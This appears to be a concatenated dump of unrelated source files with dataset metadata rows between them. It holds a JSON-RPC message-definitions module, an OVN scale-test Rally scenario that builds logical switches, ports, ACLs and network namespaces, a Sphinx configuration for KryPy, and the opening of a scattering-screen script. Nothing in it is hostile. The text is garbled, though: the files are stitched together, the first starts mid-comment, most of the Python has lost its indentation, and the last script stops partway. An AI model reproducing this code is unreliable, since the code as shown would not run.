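# below; the id/method/params values are made-up examples:
#   request:      {"jsonrpc": "2.0", "id": "a1", "method": "sum", "params": [1, 2]}
#   notification: {"jsonrpc": "2.0", "method": "log", "params": {"msg": "hi"}}
#   response:     {"jsonrpc": "2.0", "id": "a1", "result": 3}
#   error:        {"jsonrpc": "2.0", "id": "a1", "error": {"code": -32601, "message": "Method not found"}}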
import six
from bsonrpc.exceptions import (
InternalError, InvalidParams, InvalidRequest, MethodNotFound,
ParseError, ServerError, UnspecifiedPeerError)
from bsonrpc.options import NoArgumentsPresentation
__license__ = 'http://mozilla.org/MPL/2.0/'
class Definitions(object):
def __init__(self, protocol, protocol_version, no_args):
self.protocol = protocol
self.protocol_version = protocol_version
self._no_args = no_args # Strategy to represent no args
def _set_params(self, msg, args, kwargs):
if not args and not kwargs:
if self._no_args == NoArgumentsPresentation.EMPTY_ARRAY:
msg['params'] = []
if self._no_args == NoArgumentsPresentation.EMPTY_OBJECT:
msg['params'] = {}
return msg
if args:
msg['params'] = args
else:
msg['params'] = kwargs
return msg
def request(self, msg_id, method_name, args, kwargs):
msg = {
self.protocol: self.protocol_version,
'id': msg_id,
'method': method_name,
}
msg = self._set_params(msg, args, kwargs)
return msg
def notification(self, method_name, args, kwargs):
msg = {
self.protocol: self.protocol_version,
'method': method_name,
}
msg = self._set_params(msg, args, kwargs)
return msg
def ok_response(self, msg_id, result):
return {
self.protocol: self.protocol_version,
'id': msg_id,
'result': result
}
def error_response(self, msg_id, error, details=None):
msg = {
self.protocol: self.protocol_version,
'id': msg_id,
'error': error
}
if details:
msg['error']['data'] = details
return msg
def _chk_protocol(self, msg):
return msg.get(self.protocol, None) == self.protocol_version
def _has_method(self, msg):
return isinstance(msg.get('method', None), six.string_types)
def _valid_params(self, msg):
return ('params' not in msg or isinstance(msg['params'], (list, dict)))
def is_request(self, msg):
return (self._chk_protocol(msg) and
self._has_method(msg) and
'id' in msg and
(msg['id'] is None or
isinstance(msg['id'], (six.string_types, int))) and
self._valid_params(msg))
def is_notification(self, msg):
return (self._chk_protocol(msg) and
self._has_method(msg) and
'id' not in msg and
self._valid_params(msg))
def is_response(self, msg):
result_and_no_error = 'result' in msg and 'error' not in msg
error_and_no_result = 'error' in msg and 'result' not in msg
return (self._chk_protocol(msg) and
isinstance(msg.get('id', None), (six.string_types, int)) and
(result_and_no_error or error_and_no_result))
def is_nil_id_error_response(self, msg):
error_and_no_result = 'error' in msg and 'result' not in msg
return (self._chk_protocol(msg) and
error_and_no_result and
'id' in msg and
msg['id'] is None)
def is_batch_request(self, msg_list):
if not msg_list:
return False
for msg in msg_list:
if not self.is_request(msg) and not self.is_notification(msg):
return False
return True
def is_batch_response(self, msg_list):
if not msg_list:
return False
for msg in msg_list:
if not self.is_response(msg):
return False
return True
class RpcErrors(object):
parse_error = {'code': -32700, 'message': 'Parse error'}
invalid_request = {'code': -32600, 'message': 'Invalid Request'}
method_not_found = {'code': -32601, 'message': 'Method not found'}
invalid_params = {'code': -32602, 'message': 'Invalid params'}
internal_error = {'code': -32603, 'message': 'Internal error'}
server_error = {'code': -32000, 'message': 'Server error'}
_promote = {
-32700: ParseError,
-32600: InvalidRequest,
-32601: MethodNotFound,
-32602: InvalidParams,
-32603: InternalError,
-32000: ServerError,
}
@classmethod
def error_to_exception(cls, error):
code = error.get('code', 0)
message = error.get('message', '')
data = error.get('data', '')
exception_cls = cls._promote.get(code, UnspecifiedPeerError)
return exception_cls(code, message, data)
| mpl-2.0 | 1,107,113,176,544,598,700 | 31.682432 | 79 | 0.565226 | false |
openvswitch/ovn-scale-test | rally_ovs/plugins/ovs/scenarios/ovn.py | 1 | 25304 | # Copyright 2016 Ebay Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from rally_ovs.plugins.ovs import scenario
from rally.task import atomic
from rally.common import logging
from rally import exceptions
from rally_ovs.plugins.ovs import ovnclients
from rally_ovs.plugins.ovs import utils
import random
import netaddr
from io import StringIO
LOG = logging.getLogger(__name__)
class OvnScenario(ovnclients.OvnClientMixin, scenario.OvsScenario):
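    # Rally scenario base class: helpers to create/delete OVN logical switches, ports,
    # ACLs, routers and address sets, and to bind ports on the emulated sandboxes.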
RESOURCE_NAME_FORMAT = "lswitch_XXXXXX_XXXXXX"
def __init__(self, context=None):
super(OvnScenario, self).__init__(context)
self._init_conns(self.context)
def _init_conns(self, context):
self._ssh_conns = {}
if not context:
return
for sandbox in context["sandboxes"]:
sb_name = sandbox["name"]
farm = sandbox["farm"]
ovs_ssh = self.farm_clients(farm, "ovs-ssh")
ovs_ssh.set_sandbox(sb_name, self.install_method,
sandbox["host_container"])
ovs_ssh.enable_batch_mode()
self._ssh_conns[sb_name] = ovs_ssh
def _get_conn(self, sb_name):
return self._ssh_conns[sb_name]
def _flush_conns(self, cmds=[]):
for _, ovs_ssh in self._ssh_conns.items():
for cmd in cmds:
ovs_ssh.run(cmd)
ovs_ssh.flush()
'''
return: [{"name": "lswitch_xxxx_xxxxx", "cidr": netaddr.IPNetwork}, ...]
'''
@atomic.action_timer("ovn.create_lswitch")
def _create_lswitches(self, lswitch_create_args, num_switches=-1):
print("create lswitch")
return super(OvnScenario, self)._create_lswitches(lswitch_create_args, num_switches)
@atomic.optional_action_timer("ovn.list_lswitch")
def _list_lswitches(self):
print("list lswitch")
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode(False)
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
return ovn_nbctl.lswitch_list()
@atomic.action_timer("ovn.delete_lswitch")
def _delete_lswitch(self, lswitches):
print("delete lswitch")
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode()
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
for lswitch in lswitches:
ovn_nbctl.lswitch_del(lswitch["name"])
ovn_nbctl.flush()
def _get_or_create_lswitch(self, lswitch_create_args=None):
pass
@atomic.action_timer("ovn.create_lport")
def _create_lports(self, lswitch, lport_create_args = [], lport_amount=1,
lport_ip_shift = 1):
LOG.info("create %d lports on lswitch %s" % \
(lport_amount, lswitch["name"]))
self.RESOURCE_NAME_FORMAT = "lpXXXXXX_XXXXXX"
batch = lport_create_args.get("batch", lport_amount)
port_security = lport_create_args.get("port_security", True)
LOG.info("Create lports method: %s" % self.install_method)
network_cidr = lswitch.get("cidr", None)
ip_addrs = None
if network_cidr:
end_ip = network_cidr.ip + lport_amount + lport_ip_shift
if not end_ip in network_cidr:
message = _("Network %s's size is not big enough for %d lports.")
raise exceptions.InvalidConfigException(
message % (network_cidr, lport_amount))
ip_addrs = netaddr.iter_iprange(network_cidr.ip + lport_ip_shift,
network_cidr.last)
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode()
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
base_mac = [i[:2] for i in self.task["uuid"].split('-')]
base_mac[0] = str(hex(int(base_mac[0], 16) & 254))
base_mac[3:] = ['00']*3
flush_count = batch
lports = []
for i in range(lport_amount):
ip = str(next(ip_addrs)) if ip_addrs else ""
if len(ip):
name = "lp_%s" % ip
else:
name = self.generate_random_name()
mac = utils.get_random_mac(base_mac)
ip_mask = '{}/{}'.format(ip, network_cidr.prefixlen)
lport = ovn_nbctl.lswitch_port_add(lswitch["name"], name, mac,
ip_mask)
ovn_nbctl.lport_set_addresses(name, [mac, ip])
if port_security:
ovn_nbctl.lport_set_port_security(name, mac)
lports.append(lport)
flush_count -= 1
if flush_count < 1:
ovn_nbctl.flush()
flush_count = batch
ovn_nbctl.flush() # ensure all commands be run
ovn_nbctl.enable_batch_mode(False)
return lports
@atomic.action_timer("ovn.delete_lport")
def _delete_lport(self, lports):
print("delete lport")
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode()
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
for lport in lports:
ovn_nbctl.lport_del(lport["name"])
ovn_nbctl.flush()
@atomic.action_timer("ovn.list_lports")
def _list_lports(self, lswitches):
print("list lports")
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode(False)
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
for lswitch in lswitches:
LOG.info("list lports on lswitch %s" % lswitch["name"])
ovn_nbctl.lport_list(lswitch["name"])
@atomic.optional_action_timer("ovn.create_acl")
def _create_acl(self, lswitch, lports, acl_create_args, acls_per_port):
sw = lswitch["name"]
LOG.info("create %d ACLs on lswitch %s" % (acls_per_port, sw))
direction = acl_create_args.get("direction", "to-lport")
priority = acl_create_args.get("priority", 1000)
action = acl_create_args.get("action", "allow")
address_set = acl_create_args.get("address_set", "")
'''
match template: {
"direction" : "<inport/outport>",
"lport" : "<swicth port>",
"address_set" : "<address_set id>"
"l4_port" : "<l4 port number>",
}
'''
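        # For example (illustrative values only): with the default template, direction
        # "to-lport", a port named "lp_10.0.0.5" and i == 0 the match becomes:
        #   outport == lp_10.0.0.5 && ip4 && udp && udp.src == 100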
match_template = acl_create_args.get("match",
"%(direction)s == %(lport)s && \
ip4 && udp && udp.src == %(l4_port)s")
if direction == "from-lport":
p = "inport"
else:
p = "outport"
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode()
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
for lport in lports:
for i in range(acls_per_port):
match = match_template % { 'direction' : p,
'lport' : lport["name"],
'address_set' : address_set,
'l4_port' : 100 + i }
ovn_nbctl.acl_add(sw, direction, priority, match, action)
ovn_nbctl.flush()
@atomic.action_timer("ovn.list_acl")
def _list_acl(self, lswitches):
LOG.info("list ACLs")
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode(False)
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
for lswitch in lswitches:
LOG.info("list ACLs on lswitch %s" % lswitch["name"])
ovn_nbctl.acl_list(lswitch["name"])
@atomic.action_timer("ovn.delete_all_acls")
def _delete_all_acls_in_lswitches(self, lswitches):
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode(True)
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
for lswitch in lswitches:
self._delete_acls(lswitch)
ovn_nbctl.flush()
def _delete_acls(self, lswitch, direction=None, priority=None,
match=None, flush=False):
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
LOG.info("delete ACLs on lswitch %s" % lswitch["name"])
ovn_nbctl.acl_del(lswitch["name"], direction, priority, match)
if flush:
ovn_nbctl.flush()
@atomic.action_timer("ovn_network.create_routers")
def _create_routers(self, router_create_args):
LOG.info("Create Logical routers")
return super(OvnScenario, self)._create_routers(router_create_args)
@atomic.action_timer("ovn_network.delete_routers")
def _delete_routers(self):
LOG.info("Delete Logical routers")
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode(False)
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
for lrouter in ovn_nbctl.lrouter_list():
ovn_nbctl.lrouter_del(lrouter["name"])
@atomic.action_timer("ovn_network.connect_network_to_router")
def _connect_networks_to_routers(self, lnetworks, lrouters, networks_per_router):
super(OvnScenario, self)._connect_networks_to_routers(lnetworks,
lrouters,
networks_per_router)
@atomic.action_timer("ovn_network.create_phynet")
def _create_phynet(self, lswitches, physnet, batch):
LOG.info("Create phynet method: %s" % self.install_method)
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode()
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
flush_count = batch
for lswitch in lswitches:
network = lswitch["name"]
port = "provnet-%s" % network
ovn_nbctl.lswitch_port_add(network, port)
ovn_nbctl.lport_set_addresses(port, ["unknown"])
ovn_nbctl.lport_set_type(port, "localnet")
ovn_nbctl.lport_set_options(port, "network_name=%s" % physnet)
flush_count -= 1
if flush_count < 1:
ovn_nbctl.flush()
flush_count = batch
ovn_nbctl.flush()
    # NOTE(huikang): num_networks overrides the "amount" in network_create_args
def _create_networks(self, network_create_args, num_networks=-1):
physnet = network_create_args.get("physical_network", None)
lswitches = self._create_lswitches(network_create_args, num_networks)
batch = network_create_args.get("batch", len(lswitches))
if physnet != None:
self._create_phynet(lswitches, physnet, batch)
return lswitches
def _bind_ports_and_wait(self, lports, sandboxes, port_bind_args):
port_bind_args = port_bind_args or {}
wait_up = port_bind_args.get("wait_up", False)
# "wait_sync" takes effect only if wait_up is True.
        # By default we wait for all HVs to catch up with the change.
wait_sync = port_bind_args.get("wait_sync", "hv")
if wait_sync.lower() not in ['hv', 'sb', 'none']:
raise exceptions.InvalidConfigException(_(
"Unknown value for wait_sync: %s. "
"Only 'hv', 'sb' and 'none' are allowed.") % wait_sync)
LOG.info("Bind lports method: %s" % self.install_method)
self._bind_ports(lports, sandboxes, port_bind_args)
if wait_up:
self._wait_up_port(lports, wait_sync)
def _bind_ovs_internal_vm(self, lport, sandbox, ovs_ssh):
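        # Emulate a "VM" behind the port: move the OVS internal interface into its own
        # network namespace and configure its MAC, IP and a multicast route there.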
port_name = lport["name"]
port_mac = lport["mac"]
port_ip = lport["ip"]
# TODO: some containers don't have ethtool installed
if not sandbox["host_container"]:
# Disable tx offloading on the port
ovs_ssh.run('ethtool -K {p} tx off &> /dev/null'.format(p=port_name))
ovs_ssh.run('ip netns add {p}'.format(p=port_name))
ovs_ssh.run('ip link set {p} netns {p}'.format(p=port_name))
ovs_ssh.run('ip netns exec {p} ip link set {p} address {m}'.format(
p=port_name, m=port_mac)
)
ovs_ssh.run('ip netns exec {p} ip addr add {ip} dev {p}'.format(
p=port_name, ip=port_ip)
)
ovs_ssh.run('ip netns exec {p} ip link set {p} up'.format(
p=port_name)
)
# Add route for multicast traffic
ovs_ssh.run('ip netns exec {p} ip route add 224/4 dev {p}'.format(
p=port_name)
)
# Store the port in the context so we can use its information later
# on or at cleanup
self.context["ovs-internal-ports"][port_name] = (lport, sandbox)
def _delete_ovs_internal_vm(self, port_name, ovs_ssh, ovs_vsctl):
ovs_vsctl.del_port(port_name)
ovs_ssh.run('ip netns del {p}'.format(p=port_name))
def _flush_ovs_internal_ports(self, sandbox):
stdout = StringIO()
host_container = sandbox["host_container"]
sb_name = sandbox["name"]
farm = sandbox["farm"]
ovs_vsctl = self.farm_clients(farm, "ovs-vsctl")
ovs_vsctl.set_sandbox(sandbox, self.install_method, host_container)
ovs_vsctl.run("find interface type=internal", ["--bare", "--columns", "name"], stdout=stdout)
output = stdout.getvalue()
ovs_ssh = self.farm_clients(farm, "ovs-ssh")
ovs_ssh.set_sandbox(sb_name, self.install_method, host_container)
for name in list(filter(None, output.splitlines())):
if "lp" not in name:
continue
self._delete_ovs_internal_vm(name, ovs_ssh, ovs_vsctl)
def _cleanup_ovs_internal_ports(self, sandboxes):
conns = {}
for sandbox in sandboxes:
sb_name = sandbox["name"]
farm = sandbox["farm"]
host_container = sandbox["host_container"]
ovs_ssh = self.farm_clients(farm, "ovs-ssh")
ovs_ssh.set_sandbox(sb_name, self.install_method,
host_container)
ovs_ssh.enable_batch_mode()
ovs_vsctl = self.farm_clients(farm, "ovs-vsctl")
ovs_vsctl.set_sandbox(sandbox, self.install_method,
host_container)
ovs_vsctl.enable_batch_mode()
conns[sb_name] = (ovs_ssh, ovs_vsctl)
for _, (lport, sandbox) in self.context["ovs-internal-ports"].items():
sb_name = sandbox["name"]
(ovs_ssh, ovs_vsctl) = conns[sb_name]
self._delete_ovs_internal_vm(lport["name"], ovs_ssh, ovs_vsctl)
for _, (ovs_ssh, ovs_vsctl) in conns.items():
ovs_vsctl.flush()
ovs_ssh.flush()
@atomic.action_timer("ovn_network.bind_port")
def _bind_ports(self, lports, sandboxes, port_bind_args):
internal = port_bind_args.get("internal", False)
sandbox_num = len(sandboxes)
lport_num = len(lports)
lport_per_sandbox = int((lport_num + sandbox_num - 1) / sandbox_num)
if (len(lports) < len(sandboxes)):
for lport in lports:
sandbox_data = random.choice(sandboxes)
farm = sandbox_data['farm']
sandbox = sandbox_data['name']
ovs_vsctl = self.farm_clients(farm, "ovs-vsctl")
ovs_vsctl.set_sandbox(sandbox, self.install_method,
sandbox_data['host_container'])
ovs_vsctl.enable_batch_mode()
port_name = lport["name"]
port_mac = lport["mac"]
port_ip = lport["ip"]
LOG.info("bind %s to %s on %s" % (port_name, sandbox, farm))
ovs_vsctl.add_port('br-int', port_name, internal=internal)
ovs_vsctl.db_set('Interface', port_name,
('external_ids', {"iface-id": port_name,
"iface-status": "active"}),
('admin_state', 'up'))
ovs_vsctl.flush()
# If it's an internal port create a "fake vm"
if internal:
ovs_ssh = self.farm_clients(farm, "ovs-ssh")
self._bind_ovs_internal_vm(lport, sandbox_data, ovs_ssh)
ovs_ssh.flush()
else:
j = 0
for i in range(0, len(lports), lport_per_sandbox):
lport_slice = lports[i:i+lport_per_sandbox]
sandbox = sandboxes[j]["name"]
farm = sandboxes[j]["farm"]
ovs_vsctl = self.farm_clients(farm, "ovs-vsctl")
ovs_vsctl.set_sandbox(sandbox, self.install_method,
sandboxes[j]["host_container"])
ovs_vsctl.enable_batch_mode()
for index, lport in enumerate(lport_slice):
port_name = lport["name"]
LOG.info("bind %s to %s on %s" % (port_name, sandbox, farm))
ovs_vsctl.add_port('br-int', port_name, internal=internal)
ovs_vsctl.db_set('Interface', port_name,
('external_ids', {"iface-id":port_name,
"iface-status":"active"}),
('admin_state', 'up'))
if index % 400 == 0:
ovs_vsctl.flush()
ovs_vsctl.flush()
# If it's an internal port create a "fake vm"
if internal:
ovs_ssh = self.farm_clients(farm, "ovs-ssh")
ovs_ssh.enable_batch_mode()
for index, lport in enumerate(lport_slice):
self._bind_ovs_internal_vm(lport, sandboxes[j], ovs_ssh)
if index % 200 == 0:
ovs_ssh.flush()
ovs_ssh.flush()
j += 1
@atomic.action_timer("ovn_network.wait_port_up")
def _wait_up_port(self, lports, wait_sync):
LOG.info("wait port up. sync: %s" % wait_sync)
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode(True)
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
for index, lport in enumerate(lports):
ovn_nbctl.wait_until('Logical_Switch_Port', lport["name"], ('up', 'true'))
if index % 400 == 0:
ovn_nbctl.flush()
if wait_sync != "none":
ovn_nbctl.sync(wait_sync)
@atomic.action_timer("ovn_network.list_oflow_count_for_sandboxes")
def _list_oflow_count_for_sandboxes(self, sandboxes,
sandbox_args):
oflow_data = []
for sandbox in sandboxes:
sandbox_name = sandbox["name"]
farm = sandbox["farm"]
            host_container = sandbox["host_container"]
ovs_ofctl = self.farm_clients(farm, "ovs-ofctl")
ovs_ofctl.set_sandbox(sandbox_name, self.install_method,
host_container)
bridge = sandbox_args.get('bridge', 'br-int')
lflow_count = ovs_ofctl.dump_flows(bridge)
LOG.debug('openflow count on %s is %s' % (sandbox_name, lflow_count))
oflow_data.append([sandbox_name, lflow_count])
# Leverage additive plot as each sandbox has just one openflow count.
additive_oflow_data = {
"title": "Openflow count on each sandbox in StackedArea",
"description": "Openflow count on each sandbox",
"chart_plugin": "StackedArea", "data": oflow_data
}
self.add_output(additive_oflow_data)
def _create_address_set(self, set_name, address_list):
LOG.info("create %s address_set [%s]" % (set_name, address_list))
name = "name=\"" + set_name + "\""
addr_list="\"" + address_list + "\""
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.create("Address_Set", name, ('addresses', addr_list))
ovn_nbctl.flush()
def _address_set_add_addrs(self, set_name, address_list):
LOG.info("add [%s] to address_set %s" % (address_list, set_name))
name = "\"" + set_name + "\""
addr_list="\"" + address_list + "\""
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.add("Address_Set", name, ('addresses', ' ', addr_list))
ovn_nbctl.flush()
def _address_set_remove_addrs(self, set_name, address_list):
LOG.info("remove [%s] from address_set %s" % (address_list, set_name))
name = "\"" + set_name + "\""
addr_list="\"" + address_list + "\""
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.remove("Address_Set", name, ('addresses', ' ', addr_list))
ovn_nbctl.flush()
def _list_address_set(self):
stdout = StringIO()
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
ovn_nbctl.run("list address_set", ["--bare", "--columns", "name"], stdout=stdout)
ovn_nbctl.flush()
output = stdout.getvalue()
return output.splitlines()
def _remove_address_set(self, set_name):
LOG.info("remove %s address_set" % set_name)
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.destroy("Address_Set", set_name)
ovn_nbctl.flush()
def _get_address_set(self, set_name):
LOG.info("get %s address_set" % set_name)
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode(False)
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
return ovn_nbctl.get("Address_Set", set_name, 'addresses')
| apache-2.0 | 7,730,396,663,554,991,000 | 41.743243 | 101 | 0.561769 | false |
andrenarchy/krypy-debian | docs/conf.py | 1 | 7810 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# KryPy documentation build configuration file, created by
# sphinx-quickstart on Fri Jun 21 17:54:43 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('..'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.autosummary', 'sphinx.ext.mathjax']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'KryPy'
copyright = u'2013, André Gaul'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
autoclass_content = 'both'
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'nature'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'KryPydoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'KryPy.tex', 'KryPy Documentation',
'André Gaul', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'krypy', 'KryPy Documentation',
['André Gaul'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'KryPy', 'KryPy Documentation',
'André Gaul', 'KryPy', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| mit | -3,065,985,378,435,863,600 | 30.991803 | 83 | 0.702793 | false |
krosenfeld/scatterbrane | docs/_code/time_variability.py | 1 | 3849 | '''
Generate a time series incorporating the motion of the screen across the source.
This script may take a long time to run. I suggest you read through it first and
adjust the num_samples variable to check out its performance.
'''
import numpy as np
from scipy.ndimage import imread
import time
import matplotlib.pyplot as plt
from palettable.cubehelix import jim_special_16
cmap = jim_special_16.mpl_colormap
plt.rcParams['image.origin'] = 'lower'
plt.rcParams['patch.edgecolor'] = 'white'
plt.rcParams['lines.linewidth'] = 2
from scatterbrane import Brane,utilities
# set up logger
import logging
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger()
# import our source image and covert it to gray scale
src_file = 'source_images/nh_01_stern_05_pluto_hazenew2.square.jpg'
rgb = imread(src_file)[::-1]
I = (np.array([0.2989,0.5870,0.1140])[np.newaxis,np.newaxis,:]*rgb).sum(axis=-1)
I *= np.pi/I.sum()
# make up some scale for our image.
write_figs = False
wavelength=1e-3
FOV = 90.
dx = FOV/I.shape[0]
# initialize the scattering screen @ 0.87mm
